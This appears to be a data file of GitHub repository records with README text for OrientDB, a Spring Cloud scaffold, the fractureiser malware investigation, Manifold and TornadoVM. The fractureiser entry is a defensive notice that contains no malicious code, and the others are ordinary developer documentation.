Yes. OrientDB is totally written in [Java](http://en.wikipedia.org/wiki/Java_%28programming_language%29) and can run on any platform without configuration and installation. Do you develop with a language other than Java? No problem, look at the [Programming Language Bindings](http://orientdb.org/docs/3.1.x/apis-and-drivers/).

## Main References

- [Documentation Version < 3.2.x](http://orientdb.org/docs/3.1.x/)
- For any questions visit the [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions)

[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/).

--------

## Contributing

For the guide to contributing to OrientDB check out the [CONTRIBUTING.MD](https://github.com/orientechnologies/orientdb/blob/develop/CONTRIBUTING.md)

All contributions are considered licensed under the Apache 2 license unless stated otherwise.

--------

## Licensing

OrientDB is licensed by OrientDB LTD under the Apache 2 license.
OrientDB relies on the following 3rd party libraries, which are compatible with the Apache license: - Javamail: CDDL license (http://www.oracle.com/technetwork/java/faq-135477.html) - java persistence 2.0: CDDL license - JNA: Apache 2 (https://github.com/twall/jna/blob/master/LICENSE) - Hibernate JPA 2.0 API: Eclipse Distribution License 1.0 - ASM: OW2 References: - Apache 2 license (Apache2): http://www.apache.org/licenses/LICENSE-2.0.html - Common Development and Distribution License (CDDL-1.0): http://opensource.org/licenses/CDDL-1.0 - Eclipse Distribution License (EDL-1.0): http://www.eclipse.org/org/documents/edl-v10.php (http://www.eclipse.org/org/documents/edl-v10.php) ### Sponsors [![](http://s1.softpedia-static.com/_img/sp100free.png?1)](http://www.softpedia.com/get/Internet/Servers/Database-Utils/OrientDB.shtml#status) -------- ### Reference Recent architecture re-factoring and improvements are described in our [BICOD 2021](http://ceur-ws.org/Vol-3163/BICOD21_paper_3.pdf) paper: ``` @inproceedings{DBLP:conf/bncod/0001DLT21, author = {Daniel Ritter and Luigi Dell'Aquila and Andrii Lomakin and Emanuele Tagliaferri}, title = {OrientDB: {A} NoSQL, Open Source {MMDMS}}, booktitle = {Proceedings of the The British International Conference on Databases 2021, London, United Kingdom, March 28, 2022}, series = {{CEUR} Workshop Proceedings}, volume = {3163}, pages = {10--19}, publisher = {CEUR-WS.org}, year = {2021} } ```
0
zhoutaoo/SpringCloud
A microservice development scaffold based on Spring Cloud 2.1, integrating spring-security-oauth2, nacos, feign, sentinel, spring-cloud-gateway, and more. For service governance it brings in elasticsearch, skywalking, springboot-admin, zipkin, etc., so that project development can move quickly into business development instead of spending too much time on setting up the architecture. Continuously updated.
elasticsearch eureka feign-client hystrix jetcache moss nacos oauth2 sentinel skywalking spring-cloud-gateway spring-security springboot springboot-admin springboot-springcloud springcloud zipkin zipkin-sleuth
null
0
fractureiser-investigation/fractureiser
Information about the fractureiser malware
null
<p align="center"> <img src="docs/media/logo.svg" alt="fractureiser logo" height="240"> </p> **Translations to other languages:** *These were made at varying times in this document's history and **may be outdated** — especially the current status in README.md.* * [简体中文版本见此](./lang/zh-CN/) * [Polska wersja](./lang/pl-PL/) * [Читать на русском языке](./lang/ru-RU/) * [한국어는 이곳으로](./lang/ko-KR/) * Many others that are unfinished can be found in [Pull Requests](https://github.com/fractureiser-investigation/fractureiser/pulls) ## What? `fractureiser` is a [virus](https://en.wikipedia.org/wiki/Computer_virus) found in several Minecraft projects uploaded to CurseForge and BukkitDev. The malware is embedded in multiple mods, some of which were added to highly popular modpacks. The malware is only known to target Windows and Linux. If left unchecked, fractureiser can be **INCREDIBLY DANGEROUS** to your machine. Please read through this document for the info you need to keep yourself safe. We've dubbed this malware fractureiser because that's the name of the CurseForge account that uploaded the most notable malicious files. ## Current Investigation Status The fractureiser event has ended — no follow-up Stage0s were ever discovered and no further evidence of activity has been discovered in the past 3 months. A third C&C was never stood up to our knowledge. A copycat malware is still possible — and likely inevitable — but *fractureiser* is dead. **Systems that are already infected are still cause for concern**, and the below user documentation is still relevant. ## Follow-Up Meeting On 2023-06-08 the fractureiser Mitigation Team held a meeting with notable members of the community to discuss preventive measures and solutions for future problems of this scale. See [this page](https://github.com/fractureiser-investigation/fractureiser/blob/main/docs/2023-06-08-meeting.md) for the agenda and minutes of the event. ## BlanketCon Panel emilyploszaj and jaskarth, core members of the team, held a panel at BlanketCon 23 about the fractureiser mitigation effort. You can find a [recording of the panel by quat on YouTube](https://youtu.be/9eBmqHAk9HI). ## What YOU need to know ### [Modded Players CLICK HERE](docs/users.md) If you're simply a mod player and not a developer, the above link is all you need. It contains surface level information of the malware's effects, steps to check if you have it and how to remove it, and an FAQ. Anyone who wishes to dig deeper may also look at * [Event Timeline](docs/timeline.md) * [Technical Breakdown](docs/tech.md) ### I have never used any Minecraft mods You are not infected. ## Additional Info We've stopped receiving new unique samples, so the sample submission inbox is closed. If you would like to get in contact with the team, please shoot an email to `fractureiser@unascribed.com`. If you copy portions of this document elsewhere, *please* put a prominent link back to this [GitHub Repository](https://github.com/fractureiser-investigation/fractureiser) somewhere near the top so that people can read the latest updates and get in contact. The **only** official public channel that this team ever used for coordination was #cfmalware on EsperNet. ***We have no affiliation with any Discord guilds.*** **Do not ask for samples.** If you have experience and credentials, that's great, but we have no way to verify this without using up tons of our team's limited time. Sharing malware samples is dangerous, even among people who know what they're doing. 
--- \- the [fractureiser Mitigation Team](docs/credits.md)
0
manifold-systems/manifold
Manifold is a Java compiler plugin, its features include Metaprogramming, Properties, Extension Methods, Operator Overloading, Templates, a Preprocessor, and more.
android-studio delegation duck-typing extension-methods graphql graphql-java intellij java java-development java-sql java-tooling js-java-interoperability json manifold metaprogramming preprocessor reflection-framework structural-typing template-engine type-providers
<br> <img width="500" height="121" align="top" src="./docs/images/manifold_green.png"> ![latest](https://img.shields.io/badge/latest-v2024.1.12-royalblue.svg) [![slack](https://img.shields.io/badge/slack-manifold-seagreen.svg?logo=slack)](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) [![GitHub Repo stars](https://img.shields.io/github/stars/manifold-systems/manifold?logo=github&style=flat&color=tan)](https://github.com/manifold-systems/manifold) --- ## What is Manifold? Manifold is a Java compiler plugin. It supplements Java with: * Direct, _type-safe_ access to: * [SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) _**(New!)**_ * [GraphQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) * [JSON & JSON Schema](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), [YAML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), [XML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml) * [CSV](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv) * [JavaScript](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js) * etc. * [Extension methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) * [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) * [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) * [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) * [Operator overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) * [Unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) * [A *Java* template engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) * [A preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) * ...and more All fully supported in JDK LTS releases 8 - 21 + latest with comprehensive IDE support in **IntelliJ IDEA** and **Android Studio**. Manifold consists of a set of modules, one for each feature. Simply add the Manifold dependencies of your choosing to your existing project and begin taking advantage of them. ># _**What's New...**_ > >[<img width="40%" height="40%" align="top" src="./docs/images/manifoldsql.png">](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) > >### [Type-safe SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) > Manifold SQL lets you write native SQL _directly_ and _type-safely_ in your Java code. >- Query types are instantly available as you type native SQL of any complexity in your Java code >- Schema types are automatically derived from your database, providing type-safe CRUD, decoupled TX, and more >- No ORM, No DSL, No wiring, and No code generation build steps > <br><br> > [![img_3.png](./docs/images/img_3.png)](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) ## Who is using Manifold? 
Sampling of companies using Manifold: <img width="80%" height="80%" src="./docs/images/companies.png"> ## What can you do with Manifold? ### [Meta-programming](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold) Use the framework to gain direct, type-safe access to *any* type of resource, such as [**SQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql), [**JSON**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), [**GraphQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql), [**XML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml), [**YAML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), [**CSV**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv), and even other languages such as [**JavaScript**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js). Remove the code gen step in your build process. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/graphql.mp4) [**SQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql) Use _native_ SQL of any complexity _directly_ and _type-safely_ from Java. ```java Language english = "[.sql/]select * from Language where name = 'English'".fetchOne(); Film film = Film.builder("My Movie", english) .withDescription("Nice movie") .withReleaseYear(2023) .build(); MyDatabase.commit(); ``` [**GraphQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) Use types defined in .graphql files *directly*, no code gen steps! Make GraphQL changes and immediately use them with code completion. ```java var query = MovieQuery.builder(Action).build(); var result = query.request("http://com.example/graphql").post(); var actionMovies = result.getMovies(); for (var movie : actionMovies) { out.println( "Title: " + movie.getTitle() + "\n" + "Genre: " + movie.getGenre() + "\n" + "Year: " + movie.getReleaseDate().getYear() + "\n"); } ``` [**JSON:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json) Use .json schema files directly and type-safely, no code gen steps! Find usages of .json properties in your Java code. ```java // From User.json User user = User.builder("myid", "mypassword", "Scott") .withGender(male) .withDob(LocalDate.of(1987, 6, 15)) .build(); User.request("http://api.example.com/users").postOne(user); ``` ### [Extension Methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) Add your own methods to existing Java classes, even *String*, *List*, and *File*. Eliminate boilerplate code. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/ExtensionMethod.mp4) ```java String greeting = "hello"; greeting.myMethod(); // Add your own methods to String! ``` ### [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) Favor composition over inheritance. Use `@link` and `@part` for automatic interface implementation forwarding and _true_ delegation. 
> ```java > class MyClass implements MyInterface { > @link MyInterface myInterface; // transfers calls on MyInterface to myInterface > > public MyClass(MyInterface myInterface) { > this.myInterface = myInterface; // dynamically configure behavior > } > > // No need to implement MyInterface here, but you can override myInterface as needed > } > ``` ### [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) Eliminate boilerplate getter/setter code, improve your overall dev experience with properties. ```java public interface Book { @var String title; // no more boilerplate code! } // refer to it directly by name book.title = "Daisy"; // calls setter String name = book.title; // calls getter book.title += " chain"; // calls getter & setter ``` Additionally, the feature automatically _**infers**_ properties, both from your existing source files and from compiled classes your project uses. Reduce property use from this: ```java Actor person = result.getMovie().getLeadingRole().getActor(); Likes likes = person.getLikes(); likes.setCount(likes.getCount() + 1); ``` to this: ```java result.movie.leadingRole.actor.likes.count++; ``` ### [Operator Overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) Implement *operator* methods on any type to directly support arithmetic, relational, index, and unit operators. ```java // BigDecimal expressions if (bigDec1 > bigDec2) { BigDecimal result = bigDec1 + bigDec2; ... } // Implement operators for any type MyType value = myType1 + myType2; ``` ### [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) Tuple expressions provide concise syntax to group named data items in a lightweight structure. ```java var t = (name: "Bob", age: "35"); System.out.println("Name: " + t.name + " Age: " + t.age); var t = (person.name, person.age); System.out.println("Name: " + t.name + " Age: " + t.age); ``` You can also use tuples with new [`auto` type inference](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-inference-with-auto) to enable multiple return values from a method. ### [Unit Expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) Unit or *binding* operations are unique to the Manifold framework. They provide a powerfully concise syntax and can be applied to a wide range of applications. ```java import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc ... Length distance = 100 mph * 3 hr; Force f = 5.2 kg m/s/s; // same as 5.2 N Mass infant = 9 lb + 8.71 oz; ``` ### [Ranges](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections#ranges) Easily work with the *Range* API using [unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions). Simply import the *RangeFun* constants to create ranges. ```java // imports the `to`, `step`, and other "binding" constants import static manifold.collections.api.range.RangeFun.*; ... 
for (int i: 1 to 5) { out.println(i); } for (Mass m: 0kg to 10kg step 22r unit g) { out.println(m); } ``` ### [Science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) Use the [manifold-science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) framework to type-safely incorporate units and precise measurements into your applications. ```java import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc. ... Velocity rate = 65mph; Time time = 1min + 3.7sec; Length distance = rate * time; ``` ### [Preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) Use familiar directives such as **#define** and **#if** to conditionally compile your Java projects. The preprocessor offers a simple and convenient way to support multiple build targets with a single codebase. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/preprocessor.mp4) ```java #if JAVA_8_OR_LATER @Override public void setTime(LocalDateTime time) {...} #else @Override public void setTime(Calendar time) {...} #endif ``` ### [Structural Typing](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#structural-interfaces-via-structural) Unify disparate APIs. Bridge software components you do not control. Access maps through type-safe interfaces. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/structural%20typing.mp4) ```java Map<String, Object> map = new HashMap<>(); MyThingInterface thing = (MyThingInterface) map; // O_o thing.setFoo(new Foo()); Foo foo = thing.getFoo(); out.println(thing.getClass()); // prints "java.util.HashMap" ``` ### [Type-safe Reflection](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-safe-reflection-via-jailbreak) Access private features with <b>@Jailbreak</b> to avoid the drudgery and vulnerability of Java reflection. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/jailbreak.mp4) ```java @Jailbreak Foo foo = new Foo(); // Direct, *type-safe* access to *all* foo's members foo.privateMethod(x, y, z); foo.privateField = value; ``` ### [Checked Exception Handling](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions) You now have an option to make checked exceptions behave like unchecked exceptions! No more unintended exception swallowing. No more *try*/*catch*/*wrap*/*rethrow* boilerplate! ```java List<String> strings = ...; List<URL> urls = strings.stream() .map(URL::new) // No need to handle the MalformedURLException! .collect(Collectors.toList()); ``` ### [String Templates](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings) Inline variables and expressions in String literals, no more clunky string concat! [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/string_interpolation.mp4) ```java int hour = 15; // Simple variable access with '$' String result = "The hour is $hour"; // Yes!!! // Use expressions with '${}' result = "It is ${hour > 12 ? hour-12 : hour} o'clock"; ``` ### [A *Java* Template Engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) Author template files with the full expressive power of Java, use your templates directly in your code as types. 
Supports type-safe inclusion of other templates, shared layouts, and more. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/mantl.mp4) ```java List<User> users = ...; String content = abc.example.UserSample.render(users); ``` A template file *abc/example/UserSample.html.mtl* ```html <%@ import java.util.List %> <%@ import com.example.User %> <%@ params(List<User> users) %> <html lang="en"> <body> <% for(User user: users) { %> <% if(user.getDateOfBirth() != null) { %> User: ${user.getName()} <br> DOB: ${user.getDateOfBirth()} <br> <% } %> <% } %> </body> </html> ``` ## [IDE Support](https://github.com/manifold-systems/manifold) Use the [Manifold plugin](https://plugins.jetbrains.com/plugin/10057-manifold) to fully leverage Manifold with **IntelliJ IDEA** and **Android Studio**. The plugin provides comprehensive support for Manifold including code completion, navigation, usage searching, refactoring, incremental compilation, hotswap debugging, full-featured template editing, integrated preprocessor, and more. <p><img src="http://manifold.systems/images/ManifoldPlugin.png" alt="manifold ij plugin" width="60%" height="60%"/></p> [Get the plugin from JetBrains Marketplace](https://plugins.jetbrains.com/plugin/10057-manifold) ## [Projects](https://github.com/manifold-systems/manifold) The Manifold project consists of the core Manifold framework and a collection of sub-projects implementing SPIs provided by the core framework. Each project consists of one or more **dependencies** you can easily add to your project: [Manifold : _Core_](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)<br> [Manifold : _Extensions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)<br> [Manifold : _Delegation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)<br> [Manifold : _Properties_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)<br> [Manifold : _Tuples_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)<br> [Manifold : _SQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)<br> [Manifold : _GraphQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)<br> [Manifold : _JSON_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)<br> [Manifold : _XML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)<br> [Manifold : _YAML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml)<br> [Manifold : _CSV_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)<br> [Manifold : _Property Files_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-properties)<br> [Manifold : _Image_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-image)<br> [Manifold : _Dark Java_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-darkj)<br> [Manifold : _JavaScript_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)<br> [Manifold : _Java Templates_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)<br> [Manifold : _String 
Interpolation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)<br> [Manifold : _(Un)checked Exceptions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)<br> [Manifold : _Preprocessor_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)<br> [Manifold : _Science_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)<br> [Manifold : _Collections_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections)<br> [Manifold : _I/0_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-io)<br> [Manifold : _Text_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-text)<br> >Experiment with sample projects:<br> >* [Manifold : _Sample App_](https://github.com/manifold-systems/manifold-sample-project)<br> >* [Manifold : _Sample SQL App_](https://github.com/manifold-systems/manifold-sql-sample-project)<br> >* [Manifold : _Sample GraphQL App_](https://github.com/manifold-systems/manifold-sample-graphql-app)<br> >* [Manifold : _Sample REST API App_](https://github.com/manifold-systems/manifold-sample-rest-api)<br> >* [Manifold : _Sample Web App_](https://github.com/manifold-systems/manifold-sample-web-app) >* [Manifold : _Gradle Example Project_](https://github.com/manifold-systems/manifold-simple-gradle-project) >* [Manifold : _Sample Kotlin App_](https://github.com/manifold-systems/manifold-sample-kotlin-app) ## Platforms Manifold supports: * Java SE (8 - 21) * [Android](http://manifold.systems/android.html) * [Kotlin](http://manifold.systems/kotlin.html) (limited) Comprehensive IDE support is also available for IntelliJ IDEA and Android Studio. ## [Chat](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) Join our [Slack Group](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) to start a discussion, ask questions, provide feedback, etc. Someone is usually there to help. <br>
0
beehive-lab/TornadoVM
TornadoVM: A practical and efficient heterogeneous programming framework for managed languages
ai artificial-intelligence cuda fpga gpgpu gpu-acceleration gpu-computing gpus graalvm high-performance java java-library-acceleration level-zero-gpu-runtime levelzero multi-core opencl spirv tornadovm
# TornadoVM <img align="left" width="250" height="250" src="etc/tornadoVM_Logo.jpg"> TornadoVM is a plug-in to OpenJDK and GraalVM that allows programmers to automatically run Java programs on heterogeneous hardware. TornadoVM targets OpenCL, PTX and SPIR-V compatible devices which include multi-core CPUs, dedicated GPUs (Intel, NVIDIA, AMD), integrated GPUs (Intel HD Graphics and ARM Mali), and FPGAs (Intel and Xilinx). TornadoVM has three backends that generate OpenCL C, NVIDIA CUDA PTX assembly, and SPIR-V binary. Developers can choose which backends to install and run. ---------------------- **Website**: [tornadovm.org](https://www.tornadovm.org) **Documentation**: [https://tornadovm.readthedocs.io/en/latest/](https://tornadovm.readthedocs.io/en/latest/) For a quick introduction please read the following [FAQ](https://tornadovm.readthedocs.io/en/latest/). **Latest Release:** TornadoVM 1.0.3 - 27/03/2024 : See [CHANGELOG](https://tornadovm.readthedocs.io/en/latest/CHANGELOG.html). ---------------------- ## 1. Installation In Linux and macOS, TornadoVM can be installed automatically with the [installation script](https://tornadovm.readthedocs.io/en/latest/installation.html). For example: ```bash $ ./bin/tornadovm-installer usage: tornadovm-installer [-h] [--version] [--jdk JDK] [--backend BACKEND] [--listJDKs] [--javaHome JAVAHOME] TornadoVM Installer Tool. It will install all software dependencies except the GPU/FPGA drivers optional arguments: -h, --help show this help message and exit --version Print version of TornadoVM --jdk JDK Select one of the supported JDKs. Use --listJDKs option to see all supported ones. --backend BACKEND Select the backend to install: { opencl, ptx, spirv } --listJDKs List all JDK supported versions --javaHome JAVAHOME Use a JDK from a user directory ``` **NOTE** Select the desired backend: * `opencl`: Enables the OpenCL backend (requires OpenCL drivers) * `ptx`: Enables the PTX backend (requires NVIDIA CUDA drivers) * `spirv`: Enables the SPIRV backend (requires Intel Level Zero drivers) Example of installation: ```bash # Install the OpenCL backend with OpenJDK 21 $ ./bin/tornadovm-installer --jdk jdk21 --backend opencl # It is also possible to combine different backends: $ ./bin/tornadovm-installer --jdk jdk21 --backend opencl,spirv,ptx ``` Alternatively, TornadoVM can be installed either manually [from source](https://tornadovm.readthedocs.io/en/latest/installation.html#b-manual-installation) or by [using Docker](https://tornadovm.readthedocs.io/en/latest/docker.html). If you are planning to use Docker with TornadoVM on GPUs, you can also follow [these](https://github.com/beehive-lab/docker-tornado#docker-for-tornadovm) guidelines. You can also run TornadoVM on Amazon AWS CPUs, GPUs, and FPGAs following the instructions [here](https://tornadovm.readthedocs.io/en/latest/cloud.html). ## 2. Usage Instructions TornadoVM is currently being used to accelerate machine learning and deep learning applications, computer vision, physics simulations, financial applications, computational photography, and signal processing. Featured use-cases: - [kfusion-tornadovm](https://github.com/beehive-lab/kfusion-tornadovm): Java application for accelerating a computer-vision application using the Tornado-APIs to run on discrete and integrated GPUs. - [Java Ray-Tracer](https://github.com/Vinhixus/TornadoVM-Ray-Tracer): Java application accelerated with TornadoVM for real-time ray-tracing. 
We also have a set of [examples](https://github.com/beehive-lab/TornadoVM/tree/master/tornado-examples/src/main/java/uk/ac/manchester/tornado/examples) that includes NBody, DFT, KMeans computation and matrix computations.

**Additional Information**

- [General Documentation](https://tornadovm.readthedocs.io/en/latest/introduction.html)
- [Benchmarks](https://tornadovm.readthedocs.io/en/latest/benchmarking.html)
- [How TornadoVM executes reductions](https://tornadovm.readthedocs.io/en/latest/programming.html#parallel-reductions)
- [Execution Flags](https://tornadovm.readthedocs.io/en/latest/flags.html)
- [FPGA execution](https://tornadovm.readthedocs.io/en/latest/fpga-programming.html)
- [Profiler Usage](https://tornadovm.readthedocs.io/en/latest/profiler.html)

## 3. Programming Model

TornadoVM exposes to the programmer task-level, data-level and pipeline-level parallelism via a light Application Programming Interface (API). In addition, TornadoVM uses a single-source model, in which the code to be accelerated and the host code live in the same Java program.

Compute kernels in TornadoVM can be programmed using two different approaches (APIs):

#### a) Loop Parallel API

Compute kernels are written in sequential form (tasks programmed for single-thread execution). To express parallelism, TornadoVM exposes two annotations that can be used in loops and parameters: a) `@Parallel` for annotating parallel loops; and b) `@Reduce` for annotating parameters used in reductions.

The following code snippet shows a full example to accelerate Matrix-Multiplication using TornadoVM and the loop-parallel API:

```java
public class Compute {
    private static void mxmLoop(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
        for (@Parallel int i = 0; i < size; i++) {
            for (@Parallel int j = 0; j < size; j++) {
                float sum = 0.0f;
                for (int k = 0; k < size; k++) {
                    sum += A.get(i, k) * B.get(k, j);
                }
                C.set(i, j, sum);
            }
        }
    }

    public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) {
        TaskGraph taskGraph = new TaskGraph("s0")
            .transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution
            .task("t0", Compute::mxmLoop, A, B, C, size)              // Each task points to an existing Java method
            .transferToHost(DataTransferMode.EVERY_EXECUTION, C);     // Transfer data from device to host

        // Create an immutable task-graph
        ImmutableTaskGraph immutableTaskGraph = taskGraph.snapshot();

        // Create an execution plan from an immutable task-graph
        TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph);

        // Execute the execution plan
        TornadoExecutionResult executionResult = executionPlan.execute();
    }
}
```

#### b) Kernel API

Another way to express compute kernels in TornadoVM is via the **kernel API**. To do so, TornadoVM exposes a `KernelContext` with which the application can directly access the thread-id, allocate memory in local memory (shared memory on NVIDIA devices), and insert barriers. This model is similar to programming compute kernels in OpenCL and CUDA. Therefore, this API is more suitable for GPU/FPGA expert programmers that want more control or want to port existing CUDA/OpenCL compute kernels into TornadoVM.
The following code-snippet shows the Matrix Multiplication example using the kernel-parallel API: ```java public class Compute { private static void mxmKernel(KernelContext context, Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) { int idx = context.globalIdx; int jdx = context.globalIdy; float sum = 0; for (int k = 0; k < size; k++) { sum += A.get(idx, k) * B.get(k, jdx); } C.set(idx, jdx, sum); } public void run(Matrix2DFloat A, Matrix2DFloat B, Matrix2DFloat C, final int size) { // When using the kernel-parallel API, we need to create a Grid and a Worker WorkerGrid workerGrid = new WorkerGrid2D(size, size); // Create a 2D Worker GridScheduler gridScheduler = new GridScheduler("s0.t0", workerGrid); // Attach the worker to the Grid KernelContext context = new KernelContext(); // Create a context workerGrid.setLocalWork(32, 32, 1); // Set the local-group size TaskGraph taskGraph = new TaskGraph("s0") .transferToDevice(DataTransferMode.FIRST_EXECUTION, A, B) // Transfer data from host to device only in the first execution .task("t0", Compute::mxmKernel, context, A, B, C, size) // Each task points to an existing Java method .transferToHost(DataTransferMode.EVERY_EXECUTION, C); // Transfer data from device to host // Create an immutable task-graph ImmutableTaskGraph immutableTaskGraph = taskGraph.snapshot(); // Create an execution plan from an immutable task-graph TornadoExecutionPlan executionPlan = new TornadoExecutionPlan(immutableTaskGraph); // Execute the execution plan executionPlan.withGridScheduler(gridScheduler) .execute(); } } ``` Additionally, the two modes of expressing parallelism (kernel and loop parallelization) can be combined in the same task graph object. ## 4. Dynamic Reconfiguration Dynamic reconfiguration is the ability of TornadoVM to perform live task migration between devices, which means that TornadoVM decides where to execute the code to increase performance (if possible). In other words, TornadoVM switches devices if it can detect that a specific device can yield better performance (compared to another). With task migration, TornadoVM's approach is to switch devices only if it detects that an application can be executed faster than the CPU execution using the code compiled by C2 or the Graal JIT; otherwise, it stays on the CPU. TornadoVM can therefore be seen as a complement to the C2 and Graal JIT compilers. This is because there is no single hardware to best execute all workloads efficiently. GPUs are very good at exploiting SIMD applications, and FPGAs are very good at exploiting pipeline applications. If your applications follow those models, TornadoVM will likely select heterogeneous hardware. Otherwise, it will stay on the CPU using the default compilers (C2 or Graal). To use dynamic reconfiguration, you can execute using TornadoVM policies. For example: ```java // TornadoVM will execute the code in the best accelerator. executionPlan.withDynamicReconfiguration(Policy.PERFORMANCE, DRMode.PARALLEL) .execute(); ``` Further details and instructions on how to enable this feature can be found in the following paper: * Dynamic reconfiguration: [https://dl.acm.org/doi/10.1145/3313808.3313819](https://dl.acm.org/doi/10.1145/3313808.3313819) ## 5. How to Use TornadoVM 